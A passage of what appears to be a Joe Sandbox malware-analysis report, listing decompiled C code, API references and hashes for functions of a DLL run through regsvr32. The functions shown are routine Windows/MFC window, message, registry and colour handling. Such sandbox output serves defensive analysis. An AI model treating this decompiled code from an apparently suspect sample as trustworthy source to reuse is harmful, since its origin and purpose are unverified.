				_t69 = E10023206();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100231BA(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E1003BB70(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E10019B72(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E10019C90(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                                0x10019d4d
                                                                                                                0x10019d54
                                                                                                                0x10019d5a
                                                                                                                0x10019d5f
                                                                                                                0x10019d84
                                                                                                                0x10019d84
                                                                                                                0x10019d8a
                                                                                                                0x10019d8c
                                                                                                                0x10019d8c
                                                                                                                0x10019d8a
                                                                                                                0x10019d8f
                                                                                                                0x10019d94
                                                                                                                0x10019d98
                                                                                                                0x10019d9b
                                                                                                                0x10019d9b
                                                                                                                0x10019d9e
                                                                                                                0x10019da6
                                                                                                                0x10019dab
                                                                                                                0x10019dab
                                                                                                                0x10019dae
                                                                                                                0x10019db2
                                                                                                                0x10019db5
                                                                                                                0x10019dbc
                                                                                                                0x10019dc1
                                                                                                                0x10019dc3
                                                                                                                0x10019dc7
                                                                                                                0x10019dd1
                                                                                                                0x10019dd6
                                                                                                                0x10019ddc
                                                                                                                0x10019ddf
                                                                                                                0x10019df0
                                                                                                                0x10019df7
                                                                                                                0x10019dfa
                                                                                                                0x10019dfa
                                                                                                                0x10019dc7
                                                                                                                0x10019dc1
                                                                                                                0x10019e10
                                                                                                                0x10019e12
                                                                                                                0x10019e21
                                                                                                                0x10019e2d
                                                                                                                0x10019e31
                                                                                                                0x10019e39
                                                                                                                0x10019e39
                                                                                                                0x10019e31
                                                                                                                0x10019e41
                                                                                                                0x10019e54

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2997958587-3887548279
                                                                                                                • Opcode ID: 0b16d6b774c359e320efe5439514d25896af1906794a02916b1bfc98ddc6d33f
                                                                                                                • Instruction ID: 646b7dd67a2568912bb296f69b980447bcb33747180486673163819e3e7fcb23
                                                                                                                • Opcode Fuzzy Hash: 0b16d6b774c359e320efe5439514d25896af1906794a02916b1bfc98ddc6d33f
                                                                                                                • Instruction Fuzzy Hash: E831A035600711AFD710EFB8D884A6ABBF5FF48351F16062DE5829B692EB71F840CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10037282 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10037282(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E10019C16(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1001D37F(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E10037282(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E10019C16(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1003722D(_t45, E10019C16(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E10019C16(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E10019C16(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}












                                                                                                                0x10037282
                                                                                                                0x10037282
                                                                                                                0x10037284
                                                                                                                0x1003728b
                                                                                                                0x1003732b
                                                                                                                0x1003732f
                                                                                                                0x1003733e
                                                                                                                0x10037342
                                                                                                                0x100372ed
                                                                                                                0x100372fd
                                                                                                                0x10037354
                                                                                                                0x00000000
                                                                                                                0x10037354
                                                                                                                0x100372ff
                                                                                                                0x10037300
                                                                                                                0x10037307
                                                                                                                0x10037319
                                                                                                                0x10037348
                                                                                                                0x10037348
                                                                                                                0x10037349
                                                                                                                0x1003734b
                                                                                                                0x00000000
                                                                                                                0x1003734b
                                                                                                                0x1003731b
                                                                                                                0x10037324
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037326
                                                                                                                0x10037326
                                                                                                                0x10037326
                                                                                                                0x10037327
                                                                                                                0x10037328
                                                                                                                0x1003734c
                                                                                                                0x10037351
                                                                                                                0x00000000
                                                                                                                0x10037353
                                                                                                                0x10037307
                                                                                                                0x00000000
                                                                                                                0x10037344
                                                                                                                0x100372a0
                                                                                                                0x100372a5
                                                                                                                0x100372d9
                                                                                                                0x100372c1
                                                                                                                0x100372c5
                                                                                                                0x00000000
                                                                                                                0x100372cb
                                                                                                                0x100372d4
                                                                                                                0x00000000
                                                                                                                0x100372d4
                                                                                                                0x100372c5
                                                                                                                0x100372eb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetWindow.USER32(?,00000002), ref: 1003729D
                                                                                                                • GetParent.USER32(?), ref: 100372AE
                                                                                                                • GetWindow.USER32(?,00000002), ref: 100372D1
                                                                                                                • GetWindow.USER32(?,00000002), ref: 100372E3
                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 100372F2
                                                                                                                • IsWindowVisible.USER32(?), ref: 1003730C
                                                                                                                • GetTopWindow.USER32(?), ref: 10037332
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParentVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 506644340-0
                                                                                                                • Opcode ID: db1ed30975c4b4341f77946dd70a0f166145a2dbfe5d0da4e5565e87ac678af5
                                                                                                                • Instruction ID: 4683d112d1417ba05f71a0138114187fbea13b5c4c1c149e40658622002acd44
                                                                                                                • Opcode Fuzzy Hash: db1ed30975c4b4341f77946dd70a0f166145a2dbfe5d0da4e5565e87ac678af5
                                                                                                                • Instruction Fuzzy Hash: 7D21A172A40721AFD672EB728C49F5B76DCFF44691F010914FD89AF152EA20ED4096A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10039A4B Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E10039A4B(void* __ecx) {
				struct tagMSG _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				int _t31;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					__eflags = _t21;
					if(__eflags != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				_t36 =  *((intOrPtr*)(_t24 + 0x84));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E10019C16(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
				_t31 = LockWindowUpdate( *(_t38 + 0x20));
				_t43 = _t31;
				if(_t31 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
				_t33 = E10024520(0, _t36, _t38, _t39, _t43);
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}















                                                                                                                0x10039a5a
                                                                                                                0x10039a5d
                                                                                                                0x10039a5f
                                                                                                                0x10039a84
                                                                                                                0x10039a6a
                                                                                                                0x10039a70
                                                                                                                0x10039a72
                                                                                                                0x10039a7d
                                                                                                                0x10039a83
                                                                                                                0x00000000
                                                                                                                0x10039a83
                                                                                                                0x10039b09
                                                                                                                0x10039b09
                                                                                                                0x10039a92
                                                                                                                0x10039a95
                                                                                                                0x10039a9b
                                                                                                                0x10039aa9
                                                                                                                0x10039ab0
                                                                                                                0x10039ab6
                                                                                                                0x10039ab9
                                                                                                                0x10039abc
                                                                                                                0x10039abf
                                                                                                                0x10039ac2
                                                                                                                0x10039ad4
                                                                                                                0x10039ad9
                                                                                                                0x10039adf
                                                                                                                0x10039ae1
                                                                                                                0x10039aea
                                                                                                                0x10039ae3
                                                                                                                0x10039ae3
                                                                                                                0x10039ae3
                                                                                                                0x10039af6
                                                                                                                0x10039af7
                                                                                                                0x10039afc
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetMessageA.USER32 ref: 10039A6A
                                                                                                                • DispatchMessageA.USER32 ref: 10039A7D
                                                                                                                • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10039A8C
                                                                                                                • SetRectEmpty.USER32(?), ref: 10039AB0
                                                                                                                • GetDesktopWindow.USER32 ref: 10039AC8
                                                                                                                • LockWindowUpdate.USER32(?), ref: 10039AD9
                                                                                                                • GetDCEx.USER32 ref: 10039AF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192691108-0
                                                                                                                • Opcode ID: eee638cfbedbbeda8b22226dbff34469ed2deea6dca75aa8db27abc160bf9878
                                                                                                                • Instruction ID: 09f65e7e968bd6785725b1496a7956e05750ea863ea492e76bf28e53b038bb67
                                                                                                                • Opcode Fuzzy Hash: eee638cfbedbbeda8b22226dbff34469ed2deea6dca75aa8db27abc160bf9878
                                                                                                                • Instruction Fuzzy Hash: A2213DB2500B05AFE711DF65DC88E67BBECFB08255F05092EF586C7521EB35E9048B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10035675(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                                0x10035690
                                                                                                                0x10035697
                                                                                                                0x1003569a
                                                                                                                0x1003569d
                                                                                                                0x100356a0
                                                                                                                0x100356ab
                                                                                                                0x100356e2
                                                                                                                0x100356e2
                                                                                                                0x100356ed
                                                                                                                0x100356f2
                                                                                                                0x100356f2
                                                                                                                0x100356f7
                                                                                                                0x100356fc
                                                                                                                0x100356fc
                                                                                                                0x10035705

                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 100356A3
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 100356C6
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 100356E2
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100356F2
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100356FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreate$Open
                                                                                                                • String ID: software
                                                                                                                • API String ID: 1740278721-2010147023
                                                                                                                • Opcode ID: 62c2c7bb3bdf09cc3a2889ca3b3858cddec6abeceda998d2e95bf2fba2873a8a
                                                                                                                • Instruction ID: f4c95b2887043273cea465c1da17ebb04d73c30ece9e4d32166d255c3d06eae5
                                                                                                                • Opcode Fuzzy Hash: 62c2c7bb3bdf09cc3a2889ca3b3858cddec6abeceda998d2e95bf2fba2873a8a
                                                                                                                • Instruction Fuzzy Hash: 5F111372D00159FBCB11DB9ACD89CDFBFBCEF89741F1040AAE500A7121D6719A04DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10017F75 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 10017F81
                                                                                                                • GetWindowRect.USER32 ref: 10017F9C
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10017FAF
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10017FB8
                                                                                                                • EqualRect.USER32 ref: 10017FC2
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10017FEA
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10017FF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: 00b1adbe83bcef3a522259b0912683e7d7d31cc8e02aa9cafa4427dba62b8766
                                                                                                                • Instruction ID: 6d958f451040b09417e08f1e1f3fd1edce341b46a4e12f911d2b2c27adda64c4
                                                                                                                • Opcode Fuzzy Hash: 00b1adbe83bcef3a522259b0912683e7d7d31cc8e02aa9cafa4427dba62b8766
                                                                                                                • Instruction Fuzzy Hash: A611FB7650011AAFDB00DF64DC84EABB7BDFB88350B108429F91697254EB30E945CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D51A Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D51A(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E1003D2F0(0, 0);
				_t22 = E10001710(__edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1001726A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E1003BB70(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1003D2BE(_t28);
			}











                                                                                                                0x1002d51a
                                                                                                                0x1002d51a
                                                                                                                0x1002d521
                                                                                                                0x1002d52b
                                                                                                                0x1002d537
                                                                                                                0x1002d53d
                                                                                                                0x1002d542
                                                                                                                0x1002d548
                                                                                                                0x1002d54a
                                                                                                                0x1002d54f
                                                                                                                0x1002d555
                                                                                                                0x1002d555
                                                                                                                0x1002d55d
                                                                                                                0x1002d56e
                                                                                                                0x1002d57a
                                                                                                                0x1002d57f
                                                                                                                0x1002d585
                                                                                                                0x1002d588
                                                                                                                0x1002d58d
                                                                                                                0x1002d597
                                                                                                                0x1002d597
                                                                                                                0x1002d59a
                                                                                                                0x1002d5a0
                                                                                                                0x1002d5ab

                                                                                                                APIs
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1002D521
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1002D52B
                                                                                                                  • Part of subcall function 1003D2F0: RaiseException.KERNEL32(10023196,100172B8,DF7C0CDA,?,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1003D330
                                                                                                                • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D542
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D54F
                                                                                                                  • Part of subcall function 1001726A: __CxxThrowException@8.LIBCMT ref: 1001727E
                                                                                                                • _memset.LIBCMT ref: 1002D56E
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D57F
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D5A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 356813703-0
                                                                                                                • Opcode ID: def24eefd583ca14c286eebc585be1b53909d4f89bd6ffcfa2ca1ee0578da8fe
                                                                                                                • Instruction ID: 26d0727d94b835bf11b526e35cb939738d49fc3fb0b46f7a1e8c6127f3c576ac
                                                                                                                • Opcode Fuzzy Hash: def24eefd583ca14c286eebc585be1b53909d4f89bd6ffcfa2ca1ee0578da8fe
                                                                                                                • Instruction Fuzzy Hash: C011CB70100A05AFE710EF64EC89C6ABBB9FF08354B60C52AF91A97126CB30FC20CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D039 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002D039(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                                                                0x1002d043
                                                                                                                0x1002d049
                                                                                                                0x1002d050
                                                                                                                0x1002d057
                                                                                                                0x1002d05e
                                                                                                                0x1002d06b
                                                                                                                0x1002d072
                                                                                                                0x1002d075
                                                                                                                0x1002d078
                                                                                                                0x1002d07c

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Brush
                                                                                                                • String ID:
                                                                                                                • API String ID: 2798902688-0
                                                                                                                • Opcode ID: ac4796e01312ba7b2d69d7820cecd9d1b145ccb4f1531994faa7855deb8d460e
                                                                                                                • Instruction ID: a18c4b94b262f25f692ab051dac313c6dbdc37b8c5e2508b083c57a345dbcb63
                                                                                                                • Opcode Fuzzy Hash: ac4796e01312ba7b2d69d7820cecd9d1b145ccb4f1531994faa7855deb8d460e
                                                                                                                • Instruction Fuzzy Hash: 9FF012719407445BD730BF729D49B47BAD1FFC4710F02092ED2418B990E6B6E041DF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1005527A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1005527A() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x10070f18 =  *0x10070f18 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x10070f18 = _t6;
					return _t6;
				}
			}





                                                                                                                0x1005528b
                                                                                                                0x10055295
                                                                                                                0x10055299
                                                                                                                0x100552b5
                                                                                                                0x100552b5
                                                                                                                0x00000000
                                                                                                                0x100552b5
                                                                                                                0x1005529b
                                                                                                                0x100552a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100552a3
                                                                                                                0x100552a3
                                                                                                                0x100552a8
                                                                                                                0x100552ae
                                                                                                                0x00000000
                                                                                                                0x100552ae

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version$ClipboardFormatRegister
                                                                                                                • String ID: MSWHEEL_ROLLMSG
                                                                                                                • API String ID: 2888461884-2485103130
                                                                                                                • Opcode ID: 6f18dcd10c8c3969c80a51775aa53bd8fb314a8bf8b8fda711ecb7624730db60
